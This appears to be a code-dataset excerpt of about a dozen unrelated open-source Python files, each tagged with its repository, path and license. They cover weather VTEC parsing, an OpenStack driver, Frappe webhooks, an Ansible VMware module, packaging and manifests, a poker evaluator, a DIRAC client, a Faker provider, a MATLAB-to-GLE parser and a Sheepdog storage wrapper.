"FA.A": "#2E8B57",
"FA.W": "#00FF00",
"FA.Y": "#00FF7F",
"FF.A": "#2E8B57",
"FF.S": "#8B0000",
"FF.W": "#8B0000",
"FG.Y": "#708090",
"FL.A": "#2E8B57",
"FL.S": "#00FF00",
"FL.W": "#00FF00",
"FL.Y": "#00FF7F",
"FR.Y": "#6495ED",
"FW.A": "#FFDEAD",
"FW.W": "#FF1493",
"FZ.A": "#00FFFF",
"FZ.W": "#483D8B",
"GL.A": "#FFC0CB",
"GL.W": "#DDA0DD",
"HF.A": "#9932CC",
"HF.W": "#CD5C5C",
"HT.Y": "#FF7F50",
"HU.A": "#FF00FF",
"HU.S": "#FFE4B5",
"HU.W": "#DC143C",
"HW.A": "#B8860B",
"HW.W": "#DAA520",
"HY.Y": "#00FF7F",
"HZ.A": "#4169E1",
"HZ.W": "#9400D3",
"IS.W": "#8B008B",
"LE.A": "#87CEFA",
"LE.W": "#008B8B",
"LE.Y": "#48D1CC",
"LO.Y": "#A52A2A",
"LS.A": "#66CDAA",
"LS.S": "#6B8E23",
"LS.W": "#228B22",
"LS.Y": "#7CFC00",
"LW.Y": "#D2B48C",
"MA.S": "#FFDAB9",
"MA.W": "#FFA500",
"MF.Y": "#708090",
"RB.Y": "#D8BFD8",
"RP.S": "#40E0D0",
"SC.Y": "#D8BFD8",
"SE.A": "#483D8B",
"SE.W": "#D8BFD8",
"SI.Y": "#D8BFD8",
"SM.Y": "#F0E68C",
"SQ.W": "#C71585",
"SR.A": "#FFE4B5",
"SR.W": "#9400D3",
"SS.A": "#DB7FF7",
"SS.W": "#C0C0C0",
"SU.W": "#228B22",
"SU.Y": "#BA55D3",
"SV.A": "#DB7093",
"SV.W": "#FFA500",
"SW.Y": "#D8BFD8",
"TO.A": "#FFFF00",
"TO.W": "#FF0000",
"TR.A": "#F08080",
"TR.S": "#FFE4B5",
"TR.W": "#B22222",
"TS.A": "#FF00FF",
"TS.W": "#FD6347",
"TS.Y": "#D2691E",
"TY.A": "#FF00FF",
"TY.W": "#DC143C",
"UP.A": "#4682B4",
"UP.W": "#8B008B",
"UP.Y": "#8B008B",
"WC.A": "#5F9EA0",
"WC.W": "#B0C4DE",
"WC.Y": "#AFEEEE",
"WI.Y": "#D2B48C",
"WS.A": "#4682B4",
"WS.W": "#FF69B4",
"WW.Y": "#7B68EE",
"ZF.Y": "#008080",
"ZR.Y": "#DA70D6",
}
def parse(text):
"""I look for and return vtec objects as I find them"""
vtec = []
tokens = re.findall(VTEC_RE, text)
for token in tokens:
vtec.append(VTEC(token))
return vtec
def contime(text):
"""Convert text into a UTC datetime."""
# The 0000 is the standard VTEC undefined time
if text.startswith("0000"):
return None
try:
ts = datetime.strptime(text, "%y%m%dT%H%MZ")
except Exception as err:
LOG.exception(err)
return None
# NWS has a bug sometimes whereby 1969 or 1970s timestamps are emitted
if ts.year < 1971:
return None
return ts.replace(tzinfo=timezone.utc)
def get_ps_string(phenomena, significance):
"""Return the combination of Phenomena + Significance as string"""
pstr = VTEC_PHENOMENA.get(phenomena, f"Unknown {phenomena}")
astr = VTEC_SIGNIFICANCE.get(significance, f"Unknown {significance}")
# Hack for special FW case
if significance == "A" and phenomena == "FW":
pstr = "Fire Weather"
return f"{pstr} {astr}"
def get_action_string(action):
"""Return the action string"""
return VTEC_ACTION.get(action, f"unknown {action}")
class VTEC:
"""A single VTEC encoding instance"""
def __init__(self, tokens):
self.line = tokens[0]
self.status = tokens[1]
self.action = tokens[2]
self.office = tokens[3][1:]
self.office4 = tokens[3]
self.phenomena = tokens[4]
self.significance = tokens[5]
self.etn = int(tokens[6])
self.begints = contime(tokens[7])
self.endts = contime(tokens[8])
# Not explicitly defined, but set later by product parsing logic
self.year = None
def s3(self):
"""Return a commonly used string representation."""
return f"{self.phenomena}.{self.significance}.{self.etn}"
def s2(self):
"""Return a commonly used string representation."""
return f"{self.phenomena}.{self.significance}"
def get_end_string(self, prod):
"""Return an appropriate end string for this VTEC"""
if self.action in ["CAN", "EXP"]:
return ""
if self.endts is None:
return "until further notice"
fmt = "%b %-d, %-I:%M %p"
if self.endts < (prod.valid + timedelta(hours=1)):
fmt = "%-I:%M %p"
if prod.tz is None:
fmt = "%b %-d, %-H:%M"
localts = self.endts
if prod.tz is not None:
localts = self.endts.astimezone(prod.tz)
# A bit of complexity as offices may not implement daylight saving
if prod.z is not None and prod.z.endswith("ST") and localts.dst():
localts -= timedelta(hours=1)
return "till %s %s" % (
localts.strftime(fmt),
prod.z if prod.z is not None else "UTC",
)
def get_begin_string(self, prod):
"""Return an appropriate beginning string for this VTEC"""
if self.begints is None:
return ""
fmt = "%b %-d, %-I:%M %p"
if self.begints < (prod.valid + timedelta(hours=1)):
fmt = "%-I:%M %p"
localts = self.begints.astimezone(prod.tz)
# A bit of complexity as offices may not implement daylight saving
if prod.z.endswith("ST") and localts.dst():
localts -= timedelta(hours=1)
return "valid at %s %s" % (localts.strftime(fmt), prod.z)
def url(self, year):
"""Generate a VTEC url string needed"""
return ("%s-%s-%s-%s-%s-%s-%04i") % (
year if self.year is None else self.year,
self.status,
self.action,
self.office4,
self.phenomena,
self.significance,
self.etn,
)
def get_id(self, year):
"""Return a custom string identifier for this VTEC product
This is used by the Live client
"""
return "%s-%s-%s-%s-%04i" % (
year if self.year is None else self.year,
self.office4,
self.phenomena,
self.significance,
self.etn,
)
def __str__(self):
"""Return string representation"""
return self.line
def get_ps_string(self):
"""Return the combination of Phenomena + Significance as string"""
return get_ps_string(self.phenomena, self.significance)
def get_action_string(self):
"""Return the action string"""
return get_action_string(self.action)
def product_string(self):
"""Return the combination of action and phenomena+significance"""
return "%s %s" % (self.get_action_string(), self.get_ps_string())
| akrherz/pyIEM | src/pyiem/nws/vtec.py | Python | mit | 9,773 |
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
DRAC Driver for remote system management using Dell Remote Access Card.
"""
from oslo.utils import importutils
from ironic.common import exception
from ironic.common.i18n import _
from ironic.drivers import base
from ironic.drivers.modules.drac import management
from ironic.drivers.modules.drac import power
from ironic.drivers.modules import pxe
class PXEDracDriver(base.BaseDriver):
"""Drac driver using PXE for deploy."""
def __init__(self):
if not importutils.try_import('pywsman'):
raise exception.DriverLoadError(
driver=self.__class__.__name__,
reason=_('Unable to import pywsman library'))
self.power = power.DracPower()
self.deploy = pxe.PXEDeploy()
self.management = management.DracManagement()
| faizan-barmawer/openstack_ironic | ironic/drivers/drac.py | Python | apache-2.0 | 1,355 |
# -*- coding: utf-8 -*-
# Copyright (c) 2017, Frappe Technologies and contributors
# For license information, please see license.txt
import frappe
def run_webhooks(doc, method):
'''Run webhooks for this method'''
if frappe.flags.in_import or frappe.flags.in_patch or frappe.flags.in_install:
return
if frappe.flags.webhooks_executed is None:
frappe.flags.webhooks_executed = {}
if frappe.flags.webhooks == None:
# load webhooks from cache
webhooks = frappe.cache().get_value('webhooks')
if webhooks==None:
# query webhooks
webhooks_list = frappe.get_all('Webhook',
fields=["name", "webhook_docevent", "webhook_doctype"])
# make webhooks map for cache
webhooks = {}
for w in webhooks_list:
webhooks.setdefault(w.webhook_doctype, []).append(w)
frappe.cache().set_value('webhooks', webhooks)
frappe.flags.webhooks = webhooks
# get webhooks for this doctype
webhooks_for_doc = frappe.flags.webhooks.get(doc.doctype, None)
if not webhooks_for_doc:
# no webhooks, quit
return
def _webhook_request(webhook):
if not webhook.name in frappe.flags.webhooks_executed.get(doc.name, []):
frappe.enqueue("frappe.integrations.doctype.webhook.webhook.enqueue_webhook", doc=doc, webhook=webhook)
# keep list of webhooks executed for this doc in this request
# so that we don't run the same webhook for the same document multiple times
# in one request
frappe.flags.webhooks_executed.setdefault(doc.name, []).append(webhook.name)
event_list = ["on_update", "after_insert", "on_submit", "on_cancel", "on_trash"]
if not doc.flags.in_insert:
# value change is not applicable in insert
event_list.append('on_change')
event_list.append('before_update_after_submit')
for webhook in webhooks_for_doc:
event = method if method in event_list else None
if event and webhook.webhook_docevent == event:
_webhook_request(webhook)
| mbauskar/frappe | frappe/integrations/doctype/webhook/__init__.py | Python | mit | 1,894 |
#!/usr/bin/python
# -*- coding: utf-8 -*-
# Copyright: (c) 2018, Abhijeet Kasurde <[email protected]>
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {
'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'
}
DOCUMENTATION = r'''
---
module: vmware_host_ssl_facts
short_description: Gather facts of ESXi host system about SSL
description:
- This module can be used to gather facts of the SSL thumbprint information for a host.
version_added: 2.7
author:
- Abhijeet Kasurde (@Akasurde)
notes:
- Tested on vSphere 6.5
requirements:
- python >= 2.6
- PyVmomi
options:
cluster_name:
description:
- Name of the cluster.
- SSL thumbprint information about all ESXi host system in the given cluster will be reported.
- If C(esxi_hostname) is not given, this parameter is required.
type: str
esxi_hostname:
description:
- ESXi hostname.
- SSL thumbprint information of this ESXi host system will be reported.
- If C(cluster_name) is not given, this parameter is required.
type: str
extends_documentation_fragment: vmware.documentation
'''
EXAMPLES = r'''
- name: Gather SSL thumbprint information about all ESXi Hosts in given Cluster
vmware_host_ssl_facts:
hostname: '{{ vcenter_hostname }}'
username: '{{ vcenter_username }}'
password: '{{ vcenter_password }}'
cluster_name: '{{ cluster_name }}'
delegate_to: localhost
register: all_host_ssl_facts
- name: Get SSL Thumbprint info about "{{ esxi_hostname }}"
vmware_host_ssl_facts:
hostname: "{{ vcenter_server }}"
username: "{{ vcenter_user }}"
password: "{{ vcenter_pass }}"
esxi_hostname: '{{ esxi_hostname }}'
register: ssl_facts
- set_fact:
ssl_thumbprint: "{{ ssl_facts['host_ssl_facts'][esxi_hostname]['ssl_thumbprints'][0] }}"
- debug:
msg: "{{ ssl_thumbprint }}"
- name: Add ESXi Host to vCenter
vmware_host:
hostname: '{{ vcenter_hostname }}'
username: '{{ vcenter_username }}'
password: '{{ vcenter_password }}'
datacenter_name: '{{ datacenter_name }}'
cluster_name: '{{ cluster_name }}'
esxi_hostname: '{{ esxi_hostname }}'
esxi_username: '{{ esxi_username }}'
esxi_password: '{{ esxi_password }}'
esxi_ssl_thumbprint: '{{ ssl_thumbprint }}'
state: present
'''
RETURN = r'''
host_ssl_facts:
description:
- dict with hostname as key and dict with SSL thumbprint related facts
returned: facts
type: dict
sample:
{
"10.76.33.215": {
"owner_tag": "",
"principal": "vpxuser",
"ssl_thumbprints": [
"E3:E8:A9:20:8D:32:AE:59:C6:8D:A5:91:B0:20:EF:00:A2:7C:27:EE",
"F1:AC:DA:6E:D8:1E:37:36:4A:5C:07:E5:04:0B:87:C8:75:FB:42:01"
]
}
}
'''
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.vmware import vmware_argument_spec, PyVmomi
class VMwareHostSslManager(PyVmomi):
def __init__(self, module):
super(VMwareHostSslManager, self).__init__(module)
cluster_name = self.params.get('cluster_name', None)
esxi_host_name = self.params.get('esxi_hostname', None)
self.hosts = self.get_all_host_objs(cluster_name=cluster_name, esxi_host_name=esxi_host_name)
self.hosts_facts = {}
def gather_ssl_facts(self):
for host in self.hosts:
self.hosts_facts[host.name] = dict(principal='',
owner_tag='',
ssl_thumbprints=[])
host_ssl_info_mgr = host.config.sslThumbprintInfo
if host_ssl_info_mgr:
self.hosts_facts[host.name]['principal'] = host_ssl_info_mgr.principal
self.hosts_facts[host.name]['owner_tag'] = host_ssl_info_mgr.ownerTag
self.hosts_facts[host.name]['ssl_thumbprints'] = [i for i in host_ssl_info_mgr.sslThumbprints]
self.module.exit_json(changed=False, host_ssl_facts=self.hosts_facts)
def main():
argument_spec = vmware_argument_spec()
argument_spec.update(
cluster_name=dict(type='str'),
esxi_hostname=dict(type='str'),
)
module = AnsibleModule(
argument_spec=argument_spec,
required_one_of=[
['cluster_name', 'esxi_hostname'],
],
supports_check_mode=True,
)
vmware_host_accept_config = VMwareHostSslManager(module)
vmware_host_accept_config.gather_ssl_facts()
if __name__ == "__main__":
main()
| cchurch/ansible | lib/ansible/modules/cloud/vmware/vmware_host_ssl_facts.py | Python | gpl-3.0 | 4,711 |
import os
from distutils.core import setup
def read_file_into_string(filename):
path = os.path.abspath(os.path.dirname(__file__))
filepath = os.path.join(path, filename)
try:
return open(filepath).read()
except IOError:
return ''
def get_readme():
for name in ('README', 'README.rst', 'README.md'):
if os.path.exists(name):
return read_file_into_string(name)
return ''
setup(
name='kb-search',
packages=['search', 'search.tests'],
package_data={
'search': [
'templates/*.*',
'templates/search/*.*',
],
},
version='0.1.24',
description='Search',
author='Patrick Kimber',
author_email='[email protected]',
url='[email protected]:pkimber/search.git',
classifiers=[
'Development Status :: 1 - Planning',
'Environment :: Console',
'Intended Audience :: Developers',
'License :: OSI Approved :: Apache Software License',
'Natural Language :: English',
'Operating System :: OS Independent',
'Programming Language :: Python',
'Programming Language :: Python :: 3',
'Framework :: Django :: 1.8',
'Topic :: Office/Business :: Scheduling',
],
long_description=get_readme(),
) | pkimber/search | setup.py | Python | apache-2.0 | 1,294 |
# Copyright (C) 2003 CAMP
# Please see the accompanying LICENSE file for further information.
from os import path
try:
from subprocess import Popen, PIPE
except ImportError:
from os import popen3
else:
def popen3(cmd):
p = Popen(cmd, shell=True, close_fds=True,
stdin=PIPE, stdout=PIPE, stderr=PIPE)
return p.stdin, p.stdout, p.stderr
def write_svnversion(svnversion, dir):
svnversionfile = path.join(dir, 'svnversion.py')
f = open(svnversionfile,'w')
f.write('svnversion = "%s"\n' % svnversion)
f.close()
print 'svnversion = ' +svnversion+' written to '+svnversionfile
# assert svn:ignore property if the installation is under svn control
# because svnversion.py has to be ignored by svn!
cmd = popen3('svn propset svn:ignore svnversion.py '+dir)[1]
output = cmd.read()
cmd.close()
def get_svnversion_from_svn(dir):
# try to get the last svn version number from svnversion
cmd = popen3('svnversion -n '+dir)[1] # assert we are in the project dir
output = cmd.read().strip()
cmd.close()
if not (output + ' ')[0].isdigit():
# we build from exported source (e.g. rpmbuild)
output = None
return output
svnversion = get_svnversion_from_svn(dir='gpaw')
if svnversion:
write_svnversion(svnversion, dir='gpaw')
| robwarm/gpaw-symm | gpaw/svnversion_io.py | Python | gpl-3.0 | 1,339 |
#-*- coding:utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2009 Tiny SPRL (<http://tiny.be>). All Rights Reserved
# d$
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
{
'name': 'Payroll',
'version': '1.0',
'category': 'Human Resources',
'sequence': 38,
'description': """
Generic Payroll system.
=======================
* Employee Details
* Employee Contracts
* Passport based Contract
* Allowances/Deductions
* Allow to configure Basic/Gross/Net Salary
* Employee Payslip
* Monthly Payroll Register
* Integrated with Holiday Management
""",
'author':'OpenERP SA',
'website':'http://www.openerp.com',
'images': ['images/hr_company_contributions.jpeg','images/hr_salary_heads.jpeg','images/hr_salary_structure.jpeg','images/hr_employee_payslip.jpeg'],
'depends': [
'hr',
'hr_contract',
'hr_holidays',
'decimal_precision',
],
'data': [
'security/hr_security.xml',
'wizard/hr_payroll_payslips_by_employees.xml',
'hr_payroll_view.xml',
'hr_payroll_workflow.xml',
'hr_payroll_sequence.xml',
'hr_payroll_report.xml',
'hr_payroll_data.xml',
'security/ir.model.access.csv',
'wizard/hr_payroll_contribution_register_report.xml',
'res_config_view.xml',
],
'test': [
'test/payslip.yml',
# 'test/payment_advice.yml',
# 'test/payroll_register.yml',
# 'test/hr_payroll_report.yml',
],
'demo': ['hr_payroll_demo.xml'],
'installable': True,
'auto_install': False,
'application': False,
}
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| inovtec-solutions/OpenERP | openerp/addons/hr_payroll/__openerp__.py | Python | agpl-3.0 | 2,526 |
import Gears as gears
from .. import *
class Gaussian(Component) :
def applyWithArgs(
self,
patch,
*,
maxValue : 'Gaussian function peak [um].'
= 1,
variance : 'Gaussian variance [um].'
= 200
) :
patch.setShaderVariable( name = 'gaussianVariance', value = variance )
patch.setShaderVariable( name = 'gaussianPeak', value = maxValue )
patch.setShaderFunction( name = 'shape', src = '''
vec3 shape(vec2 x){
float diff = length(x);
float g = maxValue * exp( - diff * diff / variance * 0.5 );
return vec3(g, g, g);
}
''' )
| szecsi/Gears | GearsPy/Project/PatternYard/Shape/Gaussian.py | Python | gpl-2.0 | 803 |
from numpy import *
import random
from util import *
from itertools import *
from handEvaluator import evalHand
import cardsDict
def evalHandPair(handA, handB, unseenCards, size):
complementSizeA = 5 - len(handA)
complementSizeB = 5 - len(handB)
sample = list(unseenCards)
sampleSize = len(sample)
wins = 0
count = 0
maxA = special.binom(sampleSize, complementSizeA)
maxB = special.binom(sampleSize -complementSizeA, complementSizeB)
maxSampleSize = mul(maxA, maxB)
if maxSampleSize <= size and maxSampleSize > 0:
for combA in combinations(sample, complementSizeA ) :
tmpHandA = handA[:]
tmpHandA.extend(combA)
tmpSample = unseenCards - set(combA)
for combB in combinations(tmpSample, complementSizeB) :
count+=1
tmpHandB = handB[:]
tmpHandB.extend(combB)
diff = evalHand(tmpHandA) - evalHand(tmpHandB)
win = diff >=0 and 1 or 0
wins += win
return float(wins)/float(maxSampleSize)
else:
while count < size:
count += 1
complementA = set(random.sample(unseenCards, complementSizeA) )
tmpUnseenCards = unseenCards - complementA
complementB = random.sample(tmpUnseenCards, complementSizeB)
tmpHandA = handA[:]
tmpHandA.extend(complementA)
tmpHandB = handB[:]
tmpHandB.extend(complementB)
diff = evalHand(tmpHandA) - evalHand(tmpHandB)
win = diff >=0 and 1 or 0
wins += win
return float(wins)/float(count)
class MonteCarloEvaluator:
def __init__(self, state, agentIndex, size = 1000):
self.size = size
self.state = state.deepcopy()
self.agentIndex = agentIndex
self.nextCard = state.getDeck().pop()
self.state.getAgentState(self.agentIndex).configuration.revealCard(self.nextCard)
self.unseenCards = set(self.state.getAgentState(agentIndex).getUnseenCards() )
self.handsA = state.getHands(agentIndex)
self.handsB = state.getOppHands(agentIndex)
self.preActionProbs = dict()
for i in range(5):
handName = cardsDict._HANDS[i]
self.preActionProbs[handName] = evalHandPair(self.handsA[handName], self.handsB[handName], self.unseenCards, self.size)
def eval(self, action):
tmpHandA = self.handsA[action][:]
tmpHandA.append(self.nextCard)
postActionProb = evalHandPair(tmpHandA, self.handsB[action], self.unseenCards, self.size)
postActionProbs = deepish_copy(self.preActionProbs)
postActionProbs[action] = postActionProb
winProb = self.getWinProb(postActionProbs)
return winProb
def getWinProb(self, actionProbsDict):
"""
probs : a list of 4 wait probabilities and 1 put probalbility
"""
combos3 = combinations(actionProbsDict.keys(), 3)
combos4 = combinations(actionProbsDict.keys(), 4)
combos5 = combinations(actionProbsDict.keys(), 5)
totalProb = 0
for combo in combos3:
tmpProbs = []
for action, prob in actionProbsDict.items():
if action in combo : tmpProbs.append(prob)
else : tmpProbs.append(1-prob)
totalProb += prod(tmpProbs)
for combo in combos4:
tmpProbs = []
for action, prob in actionProbsDict.items():
if action in combo : tmpProbs.append(prob)
else : tmpProbs.append(1-prob)
totalProb += prod(tmpProbs)
for combo in combos5:
tmpProbs = []
for action, prob in actionProbsDict.items():
if action in combo : tmpProbs.append(prob)
else : tmpProbs.append(1-prob)
totalProb += prod(tmpProbs)
return totalProb
| mosem/FiveOPoker | Program/monteCarloEvaluator.py | Python | mit | 3,996 |
""" Module that contains simple client access to Matcher service
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
__RCSID__ = "$Id$"
from DIRAC.Core.Base.Client import Client, createClient
from DIRAC.Core.Utilities.DEncode import ignoreEncodeWarning
from DIRAC.Core.Utilities.JEncode import strToIntDict
@createClient('WorkloadManagement/Matcher')
class MatcherClient(Client):
""" Exposes the functionality available in the WorkloadManagement/MatcherHandler
This inherits the DIRAC base Client for direct execution of server functionality.
The following methods are available (although not visible here).
"""
def __init__(self, **kwargs):
""" Simple constructor
"""
super(MatcherClient, self).__init__(**kwargs)
self.setServer('WorkloadManagement/Matcher')
@ignoreEncodeWarning
def getMatchingTaskQueues(self, resourceDict):
""" Return all task queues that match the resourceDict
"""
res = self._getRPC().getMatchingTaskQueues(resourceDict)
if res["OK"]:
# Cast the string back to int
res['Value'] = strToIntDict(res['Value'])
return res
@ignoreEncodeWarning
def getActiveTaskQueues(self):
""" Return all active task queues
"""
res = self._getRPC().getActiveTaskQueues()
if res["OK"]:
# Cast the string back to int
res['Value'] = strToIntDict(res['Value'])
return res
| yujikato/DIRAC | src/DIRAC/WorkloadManagementSystem/Client/MatcherClient.py | Python | gpl-3.0 | 1,451 |
from .. import Provider as CompanyProvider
class Provider(CompanyProvider):
formats = (
"{{company_prefix}}{{last_name}}{{company_category}}",
"{{last_name}}{{company_category}}{{company_prefix}}",
)
company_prefixes = ("株式会社", "有限会社", "合同会社")
company_categories = (
"水産",
"農林",
"鉱業",
"建設",
"食品",
"印刷",
"電気",
"ガス",
"情報",
"通信",
"運輸",
"銀行",
"保険",
)
def company_prefix(self) -> str:
return self.random_element(self.company_prefixes)
def company_category(self) -> str:
return self.random_element(self.company_categories)
| joke2k/faker | faker/providers/company/ja_JP/__init__.py | Python | mit | 762 |
from re import search, sub, match
from os.path import join
#
import s2gc
import s2gd
#
###########################
# LAMBDA FUNCTIONS ########
###########################
# match a certain expression at start of string
match_start = lambda expr,line: match(r'\s*(%s)[^a-zA-Z0-9]'%expr,line)
# ----------
# RECONSIDER
# ----------
# strip unwanted delimiters from string
strip_d = lambda s,d: sub(d,'',s)
# get first argument (cf getfargs)
getarg1 = lambda l: strip_d(get_fargs(l)[0],'\'')
# get next arg
getnextarg = lambda lst: lst.pop(0).lower().strip('\'')
getnextargNL = lambda lst: lst.pop(0).strip('\'')
#
###########################
# FUNCTIONS ###############
###########################
#
# # +++++++++++++++++++++++++++++++++++++++++
# # GET FARGS :
# # get arguments of function str
# #
# # <in>: string like plot(x,y,'linewidth',2.0)
# # <out>: list of arguments ['x','y','linewidth','2.0']
def get_fargs(l):
cur_stack = search(r'^\s*(?:\w+)\(\s*(.*)',l).group(1)
arg_list,cur_arg = [],''
prev_char = ''
while cur_stack:
cur_char = cur_stack[0]
is_open = cur_char in s2gd.keyopen
#
if is_open:
cur_arg += cur_char
closed_s,rest,f = find_delim(cur_stack[1:],cur_char,s2gd.keyclose[cur_char])
if f: raise s2gc.S2GSyntaxError(l,'<::found %s but could not close it::>'%cur_char)
cur_arg += closed_s+s2gd.keyclose[cur_char]
cur_stack = rest
continue
# transpose/string ambiguity: it's a string opener if after a comma or a space otherwise transpose
if cur_char == '\'' and (match(r'[\s,\']',prev_char) or prev_char==''):
cur_arg += '' if match(r'\'',prev_char) else '\'' # merging 'son''s' to 'son's'
closed_s,rest,f = find_delim(cur_stack[1:],'\'','\'')
if f: raise s2gc.S2GSyntaxError(l,'<::found %s but could not close it::>'%cur_char)
cur_arg += closed_s+'\''
cur_stack = rest
prev_char = ''
continue
# end of patterns: either split, break or get next char
elif cur_char == ',': # splitting comma
arg_list.append(cur_arg)
cur_arg,cur_stack,prev_char = '', cur_stack[1:].strip(),''
if not cur_stack:
raise s2gc.S2GSyntaxError(l,'<::misplaced comma::>')
elif cur_char == ')':
arg_list.append(cur_arg)
break
else:
cur_arg += cur_char
cur_stack = cur_stack[1:] # can throw syntax error (no end parens)
prev_char = cur_char
#
return arg_list
#
# Side function
def find_delim(s,d_open,d_close):
cur_idx = 0
inside_open = 1
cur_string = ''
while cur_idx < len(s):
cur_char = s[cur_idx]
cur_idx += 1
#
if cur_char == d_close: inside_open -= 1
elif cur_char == d_open: inside_open += 1
#
if not inside_open: break
else: cur_string += cur_char
#
return cur_string,'' if cur_idx==len(s) else s[cur_idx:],inside_open
#
# +++++++++++++++++++++++++++++++++++++++++++
# SAFE_POP
# tries to pop list, if error, return clarifying
# message
def safe_pop(lst,lbl=''):
try:
return lst.pop(0)
except IndexError,e:
raise s2gc.S2GSyntaxError(line,'<::found %s but no value(s)?::>'%lbl)
#
# +++++++++++++++++++++++++++++++++++++++++++
# ARRAY X
# extract numbers in array string '[a b c]'
#
# <in>: string like '[2.0 -2,3]'
# <out>: numbers ['2.0','-2','3']
# <rmk>: does not interpret expressions
def array_x(s):
array = []
# strip ends (-[-stuff-]- extract stuff)
core = match(r'(\s*\[?)([^\[^\]]+)(\]?\s*)',s).group(2)
# replace ',' by space
left = sub(',',' ',core)
# ATTEMPT - if sequence
nc = left.count(':')
if nc==1: # 1:5
spl = match(r'(^[^:]+):([^:]+$)',left);
first,last = float(spl.group(1)), float(spl.group(2))
seq,cur = [str(first)], first
while cur<=last-1:
cur+=1
seq.append(str(cur))
array = seq
elif nc==2:
spl = match(r'(^[^:]+):([^:]+):([^:]+$)',left)
first,step,last = float(spl.group(1)), float(spl.group(2)), float(spl.group(3))
seq,cur = [str(first)],first
while cur<=last-step:
cur+=step
seq.append(str(cur))
array = seq
else:
array = left.split(' ')
return [sub(' ','',e) for e in array]
#
# +++++++++++++++++++++++++++++++++++++++++++
# GET COLOR:
# (internal) read a 'color' option and
# return something in GLE format
def get_color(optstack):
#!<DEV:EXPR>
opt = getnextarg(optstack)
color = ''
a = 0
# option given form [r,g,b,a?]
rgbsearch = search(r'\[\s*([0-9]+\.?[0-9]*|\.[0-9]*)\s*[,\s]\s*([0-9]+\.?[0-9]*|\.[0-9]*)\s*[,\s]\s*([0-9]+\.?[0-9]*|\.[0-9]*)(.*)',opt)
if rgbsearch:
r,g,b = rgbsearch.group(1,2,3)
alphasearch = search(r'([0-9]+\.?[0-9]*|\.[0-9]*)',rgbsearch.group(4))
a = '1' if not alphasearch else alphasearch.group(1)
color = 'rgba(%s,%s,%s,%s)'%(r,g,b,a)
# option is x11 name + 'alpha'
elif optstack and optstack[0].lower().strip('\'')=='alpha':
optstack.pop(0)
opta = getnextarg(optstack)
# col -> rgba (using svg2rgb dictionary see s2gd.srd)
r,g,b = s2gd.srd.get(opt,(128,128,128))
a = round(float(opta)*100)
color = 'rgba255(%i,%i,%i,%2.1f)'%(r,g,b,a)
else: # just colname
color = opt
# if in matlab format (otherwise x11 name)
if color in ['r','g','b','c','m','y','k','w']:
color = s2gd.md[color]
trsp = False if a==0 or a=='1' else True
return color,trsp,optstack
#
# +++++++++++++++++++++++++++++++++++++++++++
def close_ellipsis(l,script_stack):
# gather lines in case continuation (...)
regex = r'(.*?)(?:\.\.\.\s*(?:%s.*)?$)'%s2gd.csd['comment']
srch_cl = search(regex,l)
if srch_cl:
line_open = True
nloops = 0
l = srch_cl.group(1)
while line_open and nloops<100:
nloops += 1
lt = script_stack.pop(0)
srch_cl = search(regex,lt)
if srch_cl:
l += srch_cl.group(1)
else:
line_open = False
l+=lt
if line_open:
raise s2gc.S2GSyntaxError(l,'<::line not closed::>')
return l, script_stack
| tlienart/script2gle | s2gf.py | Python | mit | 5,785 |
# Copyright (C) 2015 China Mobile Inc.
#
# zhangsong <[email protected]>
#
#This program is free software; you can redistribute it and/or
#modify it under the terms of the GNU General Public License version
#2 as published by the Free Software Foundation.
#
#You should have received a copy of the GNU General Public License
#along with this program. If not, see <http://www.gnu.org/licenses/>.
#
"""
A python wrapper of sheepdog client c library libsheepdog.so .
"""
from ctypes import *
errlist = [
"Success", #errcode : 0
"Unknown error", #errcode : 1
"No object found", #errcode : 2
"I/O error", #errcode : 3
"VDI exists already", #errcode : 4
"Invalid parameters", #errcode : 5
"System error", #errcode : 6
"VDI is already locked", #errcode : 7
"No VDI found", #errcode : 8
"No base VDI found", #errcode : 9
"Failed to read from requested VDI", #errcode : 10
"Failed to write to requested VDI", #errcode : 11
"Failed to read from base VDI", #errcode : 12
"Failed to write to base VDI", #errcode : 13
"Failed to find requested tag", #errcode : 14
"System is still booting", #errcode : 15
"VDI is not locked", #errcode : 16
"System is shutting down", #errcode : 17
"Out of memory on server", #errcode : 18
"Maximum number of VDIs reached", #errcode : 19
"Protocol version mismatch", #errcode : 20
"Server has no space for new objects", #errcode : 21
"Waiting for cluster to be formatted", #errcode : 22
"Waiting for other nodes to join cluster", #errcode : 23
"Node has failed to join cluster", #errcode : 24
"IO has halted as there are not enough living nodes", #errcode : 25
"Object is read-only", #errcode : 26
"reserved", #errcode : 27
"reserved", #errcode : 28
"Inode object is invalidated" #errcode : 29
]
class SheepdogException(Exception):
pass
def err_handle(errcode):
if (not ( 0<=errcode and errcode<len(errlist) ) ) or errlist[errcode]== 'reserved':
raise SheepdogException('Unexpected error.')
else:
raise SheepdogException(errlist[errcode])
libshared = cdll.LoadLibrary("libsheepdog.so")
sd_connect = libshared.sd_connect
sd_connect.argtypes = [c_char_p]
sd_connect.restype = c_void_p
sd_disconnect = libshared.sd_disconnect
sd_disconnect.argtypes = [c_void_p]
sd_disconnect.restype = c_int
sd_vdi_create = libshared.sd_vdi_create
sd_vdi_create.argtypes = [c_void_p, c_char_p, c_ulonglong]
sd_vdi_create.restype = c_int
sd_vdi_delete = libshared.sd_vdi_delete
